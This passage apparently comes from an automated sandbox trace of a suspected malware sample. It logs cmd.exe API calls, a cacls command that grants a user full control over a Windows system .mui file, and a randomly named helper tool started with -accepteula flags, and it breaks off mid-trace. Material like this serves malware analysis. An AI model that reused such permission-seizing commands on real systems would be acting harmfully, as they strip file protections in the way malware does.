() returned 0x6c0000 [0090.697] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x22) returned 0x6d24a8 [0090.698] GetProcessHeap () returned 0x6c0000 [0090.698] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x60) returned 0x6d24d8 [0090.698] GetConsoleTitleW (in: lpConsoleTitle=0x3ff688, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0090.699] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0090.699] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0090.700] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0090.701] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0090.702] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0090.702] GetProcessHeap () returned 0x6c0000 [0090.702] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x210) returned 0x6d2540 [0090.702] GetProcessHeap () returned 0x6c0000 [0090.702] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x7a) returned 0x6d2758 [0090.702] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0090.703] GetProcessHeap () returned 0x6c0000 [0090.703] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x418) returned 0x6d27e0 [0090.703] SetErrorMode (uMode=0x0) returned 0x0 [0090.703] SetErrorMode (uMode=0x1) returned 0x0 [0090.703] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6d27e8, lpFilePart=0x3ff1a8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff1a8*="Desktop") returned 0x25 [0090.703] SetErrorMode (uMode=0x0) returned 0x1 [0090.703] GetProcessHeap () returned 0x6c0000 [0090.703] RtlReAllocateHeap (Heap=0x6c0000, Flags=0x0, Ptr=0x6d27e0, Size=0x6e) returned 0x6d27e0 [0090.703] GetProcessHeap () returned 0x6c0000 [0090.703] RtlSizeHeap (HeapHandle=0x6c0000, Flags=0x0, MemoryPointer=0x6d27e0) returned 0x6e [0090.703] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0090.703] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0090.703] GetProcessHeap () returned 0x6c0000 [0090.703] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x120) returned 0x6d2858 [0090.706] GetProcessHeap () returned 0x6c0000 [0090.706] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0x238) returned 0x6d2980 [0090.715] GetConsoleTitleW (in: lpConsoleTitle=0x3ff41c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0090.716] InitializeProcThreadAttributeList (in: lpAttributeList=0x3ff2a4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3ff36c | out: lpAttributeList=0x3ff2a4, lpSize=0x3ff36c) returned 1 [0090.716] UpdateProcThreadAttribute (in: lpAttributeList=0x3ff2a4, dwFlags=0x0, Attribute=0x60001, lpValue=0x3ff364, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3ff2a4, lpPreviousValue=0x0) returned 1 [0090.716] GetStartupInfoW (in: lpStartupInfo=0x3ff260 | out: lpStartupInfo=0x3ff260*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0090.719] CloseHandle (hObject=0x74) returned 1 [0090.719] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0090.719] GetProcessHeap () returned 0x6c0000 [0090.719] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d2da0 | out: hHeap=0x6c0000) returned 1 [0090.719] GetEnvironmentStringsW () returned 0x6d2b90* [0090.719] GetProcessHeap () returned 0x6c0000 [0090.719] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d74f8 [0090.719] FreeEnvironmentStringsW (penv=0x6d2b90) returned 1 [0090.719] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0101.479] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3ff240 | out: lpExitCode=0x3ff240*=0x1) returned 1 [0101.479] CloseHandle (hObject=0x78) returned 1 [0101.479] _vsnwprintf (in: _Buffer=0x3ff388, _BufferCount=0x13, _Format="%08X", _ArgList=0x3ff24c | out: _Buffer="00000001") returned 8 [0101.480] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0101.480] GetProcessHeap () returned 0x6c0000 [0101.480] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d74f8 | out: hHeap=0x6c0000) returned 1 [0101.480] GetEnvironmentStringsW () returned 0x6d2b90* [0101.480] GetProcessHeap () returned 0x6c0000 [0101.480] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d74f8 [0101.481] FreeEnvironmentStringsW (penv=0x6d2b90) returned 1 [0101.481] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0101.481] GetProcessHeap () returned 0x6c0000 [0101.481] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d74f8 | out: hHeap=0x6c0000) returned 1 [0101.481] GetEnvironmentStringsW () returned 0x6d2b90* [0101.481] GetProcessHeap () returned 0x6c0000 [0101.481] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x8, Size=0xb8c) returned 0x6d74f8 [0101.481] FreeEnvironmentStringsW (penv=0x6d2b90) returned 1 [0101.481] GetProcessHeap () returned 0x6c0000 [0101.481] HeapFree (in: hHeap=0x6c0000, dwFlags=0x0, lpMem=0x6d00e8 | out: hHeap=0x6c0000) returned 1 [0101.481] DeleteProcThreadAttributeList (in: lpAttributeList=0x3ff2a4 | out: lpAttributeList=0x3ff2a4) [0101.482] _get_osfhandle (_FileHandle=1) returned 0x80 [0101.482] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0101.482] _get_osfhandle (_FileHandle=1) returned 0x80 [0101.482] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0101.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0101.482] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0101.483] SetConsoleInputExeNameW () returned 0x1 [0101.483] GetConsoleOutputCP () returned 0x1b5 [0101.483] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0101.483] SetThreadUILanguage (LangId=0x0) returned 0x409 [0101.484] exit (_Code=1) Process: id = "25" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x3b1c9000" os_pid = "0x540" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x9e0" cmd_line = "cacls \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 46 os_tid = 0x7c4 Process: id = "26" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x3992d000" os_pid = "0x600" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x5d8" cmd_line = "tdq963ii.exe -accepteula \"absolutetelnet.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 47 os_tid = 0x8ac [0095.787] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0095.793] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0095.794] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0095.794] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0095.794] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0095.794] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0095.794] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0095.795] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0095.796] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0095.797] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0095.797] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0095.797] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0095.797] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0095.797] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0095.798] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0095.799] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0095.800] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0095.800] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0095.800] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0095.800] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0095.800] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0095.801] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0095.802] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0095.803] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0095.804] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0095.804] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0095.804] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0095.804] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0095.804] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0095.805] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0095.806] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0095.807] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0095.807] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0095.807] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0095.807] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0095.808] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0095.809] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0095.809] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0095.809] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0095.809] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0095.809] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0095.809] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0095.809] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0095.809] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0095.809] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0095.810] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0095.810] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0095.810] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0095.811] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0095.811] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0095.811] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0095.811] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0095.811] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0095.811] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0095.811] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0095.825] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0096.615] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x9363680, dwHighDateTime=0x1d68287)) [0096.615] GetCurrentThreadId () returned 0x8ac [0096.615] GetCurrentProcessId () returned 0x600 [0096.615] 